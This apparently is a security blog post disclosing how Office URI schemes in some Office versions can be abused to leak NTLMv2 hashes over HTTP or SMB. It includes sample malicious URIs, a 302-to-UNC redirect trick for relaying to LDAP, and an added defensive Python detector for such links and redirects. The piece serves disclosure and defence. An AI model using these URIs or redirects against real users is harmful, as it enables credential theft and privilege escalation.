Office URI Schemes
Previously, a method for capturing NTLMv2 hashes over SMB using the Office URI Schemes was shared (LINK). This was the inspiration for me. If we look at the Office URI Schemes page, we can see that the https:// protocol is used within the URI scheme, which indicates that http:// can potentially be used as well. Capturing the NTLMv2 hash over HTTP is more advantageous than capturing it over SMB for performing an NTLM relaying attack against a Domain Controller (see the Relaying Chart).
When I used the ms-word:ofe|u|http://test.local:8080/leak/leak.docx URI against Office 2016 MSO (16.0.4266.1001) 32-bit, a warning box appeared to protect the user from malicious activity, but I cannot say the same for Microsoft 365 Office and Office 2019. These versions access a remote Office file without a warning and can be exploited to capture the NTLMv2 hash over the SMB and HTTP protocols.
Vulnerability Details
We can redirect an HTTP request to a UNC path with a 302 redirect when an Office application makes a request via an Office URI scheme (e.g., ms-word:ofe|u|http://172.20.10.8:8080/leak.docx). The uncredirect.py script handles the HTTP request that is sent with an MS Office URI scheme and redirects it to a UNC path that includes the IP address of Responder. This makes it possible to capture the NTLMv2 hash over SMB and bypass the security restriction for the ms-word:ofe|u|\\<responder ip>\leak\leak.docx URI.
Capturing the NTLMv2 hash over HTTP is more advantageous than over SMB for relaying to LDAP. When a file is requested via an Office URI, the NTLMv2 hash can be obtained over HTTP without redirecting to a UNC path using a 302 redirect. This exploitation method cannot be performed over the Internet because, unless there is a misconfiguration in Internet Properties, NTLM authentication will not occur over HTTP for a host outside the corporate network. However, I believe this is an effective method for relaying attacks and escalating privileges.
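As an added example (not code from the post or from uncredirect.py), the following Python classifies Office URI scheme links found in mail or web content and flags HTTP redirects whose Location is a UNC path, the two conditions described above. The ms-excel and ms-powerpoint schemes, the trusted host names and the sample URIs are assumptions or constructed values, not taken from the post.

```python
import re
from urllib.parse import urlparse

# Office URI shape used in the post: <scheme>:<command>|u|<document-url>
# Only ms-word appears in the post; ms-excel/ms-powerpoint are assumed from
# the same Microsoft specification.
OFFICE_SCHEMES = {"ms-word", "ms-excel", "ms-powerpoint"}
URI_RE = re.compile(r"^(?P<scheme>ms-[a-z]+):(?P<cmd>[a-z]+)\|u\|(?P<target>.+)$", re.I)
REDIRECTS = {301, 302, 303, 307, 308}

def classify_office_uri(uri, trusted_hosts):
    """Return (verdict, reason) for a link seen in mail or web content.

    trusted_hosts: hostnames of document stores allowed over HTTPS.
    """
    m = URI_RE.match(uri.strip())
    if not m or m.group("scheme").lower() not in OFFICE_SCHEMES:
        return ("ignore", "not an Office URI scheme")
    target = m.group("target")
    # UNC or file:// target: Office authenticates to that host over SMB.
    if target.startswith("\\\\") or target.lower().startswith("file:"):
        return ("block", "UNC/file target forces SMB authentication")
    parsed = urlparse(target)
    if parsed.scheme.lower() == "http":
        # Plain HTTP: the server can demand NTLM or answer 302 to a UNC path.
        return ("block", "plain-HTTP document target")
    if parsed.scheme.lower() == "https" and parsed.hostname in trusted_hosts:
        return ("allow", "HTTPS to trusted host")
    return ("review", f"HTTPS to untrusted host {parsed.hostname}")

def unc_redirect_alert(status, location):
    """True when an HTTP redirect points the client at a UNC or file:// path."""
    if status not in REDIRECTS or not location:
        return False
    loc = location.strip().lower()
    return loc.startswith("\\\\") or loc.startswith("file:")

if __name__ == "__main__":
    # Constructed samples; 10.0.0.5 stands in for the post's <responder ip>.
    trusted = {"docs.corp.example"}
    for link in (
        "ms-word:ofe|u|http://test.local:8080/leak/leak.docx",
        r"ms-word:ofe|u|\\10.0.0.5\leak\leak.docx",
        "ms-excel:ofv|u|https://docs.corp.example/budget.xlsx",
    ):
        print(link, "->", classify_office_uri(link, trusted))
    print(unc_redirect_alert(302, r"\\10.0.0.5\leak\leak.docx"))  # True
```

The second function is meant to run over proxy logs that record the status code and Location header of outbound responses, where a redirect to a UNC path from an Office user agent is the signal to investigate.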
What do you think? It would be nice to know your opinion. Leave a comment.